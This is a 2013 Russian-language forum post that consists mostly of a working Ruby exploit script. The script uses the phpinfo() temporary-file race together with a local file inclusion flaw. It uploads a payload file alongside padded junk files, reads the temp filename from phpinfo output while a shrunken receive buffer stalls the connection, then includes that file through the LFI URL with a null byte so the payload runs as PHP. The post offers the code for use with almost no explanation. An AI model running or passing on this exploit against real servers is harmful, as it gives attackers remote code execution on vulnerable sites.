20.09.2013, 16:05
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Как то так, не знаю как объяснить.
Код:
require 'socket'
require 'uri'
require 'net/http'
def main()
#setting up
puts "SETTING UP"
target = 'http://www/phpinfo.php' # phpinfo()
lfi = 'http://www/include.php?file=' # LFI template like http://www.host.com/data/lfi.php?location={LFI}
payloadLocation = 'payload.txt' # payload
junkFilesCount = 50 # tail
recvBufferSize = 1024 # receive buffer size
# just echo for u
printDotted(' -target:')
print("[#{target}]\n");
printDotted(' -lfi:')
print("[#{lfi}]\n");
printDotted(' -payload:')
print("[#{payloadLocation}]\n");
printDotted(' -junk files count:')
print("[#{junkFilesCount}]\n");
printDotted(' -receive buffer size:')
print("[#{recvBufferSize}]\n");
# try to load payload
begin
printDotted('LOAD PAYLOAD')
payload = IO.read(payloadLocation)
print("[OK]\n")
rescue
print("[ERROR]\n")
return
end
# payload
file = "-----------------------------89q8834898293409rw29\r\n"
file += "Content-Disposition: form-data; name=\"file_loader\"; filename=\"\r\npayload.txt\"\r\n"
file += "Content-Type: text/plain\r\n\r\n"
file += "#{payload}\r\n"
file += "-----------------------------89q8834898293409rw29\r\n"
# generate junk files
printDotted('PREPARE JUNK')
curJunkFiles = 0;
for junkFiles in 0..junkFilesCount
file += "-----------------------------89q8834898293409rw29\r\n"
file += "Content-Disposition: form-data; name=\"file" + rand(10000).to_s + "\"; filename=\"\r\njunk" + rand(1000000).to_s * 10000 + ".txt\"\r\n"
file += "Content-Type: text/plain\r\n\r\n"
file += "superslow\r\n"
file += "-----------------------------89q8834898293409rw29\r\n"
end
print("[OK]\n")
printDotted('prepare headers')
targetURI = URI(target)
query = targetURI.path
# add query if not empty
if !targetURI.query.nil?
query += '?' + targetURI.query
end
# headers
req = "POST #{query} HTTP/1.0\r\n"
req += "Content-Type: multipart/form-data; boundary=---------------------------89q8834898293409rw29\r\n"
req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req += "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\r\n"
req += "Host: #{targetURI.host}\r\n"
req += "Content-Length: #{file.length}\r\n"
req += "Connection: Close\r\n\r\n"
req += file
print("[OK]\n")
# create tcp socket
sock = Socket.new(:INET, :STREAM)
# and set receive buffer size
sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_RCVBUF, recvBufferSize)
printDotted('connecting to')
begin
sock.connect(Socket.pack_sockaddr_in(80, targetURI.host))
rescue
print("[ERROR]\n")
return false
end
print("[OK]\n")
sock.write(req)
data = ''
payloadFound = false
loaderFound = false
payloadFileName = ''
loaderFileName = ''
while true
printDotted("get next #{recvBufferSize} bytes")
tmpData = sock.recv(recvBufferSize)
print("[OK]\n")
if tmpData.nil?
break
end
data += tmpData
tmpFileName = data.scan(/\[name\]\s=>\spayload.txt\n\s\s\s\s\[type\]\s=>\stext\/plain\n\s\s\s\s\[tmp_name\]\s=>\s(.*?)\n\s\s\s\s\[error\]/)
if tmpFileName.length > 0
payloadFound = true
payloadFileName = tmpFileName[0][0].clone
printDotted('payload file location:')
print('[' + payloadFileName + ']' + "\n")
lfi += payloadFileName + '%00'
lfiURI = URI(lfi)
printDotted("Include #{payloadFileName}")
response = Net::HTTP.get_response(lfiURI);
if !response.is_a?(Net::HTTPOK) then
print("[ERROR]\n")
return
else
print("[OK]\n")
end
return
end
end
end
def printDotted(msg)
print msg + "." * (50 - msg.length)
end
main()
|
|
|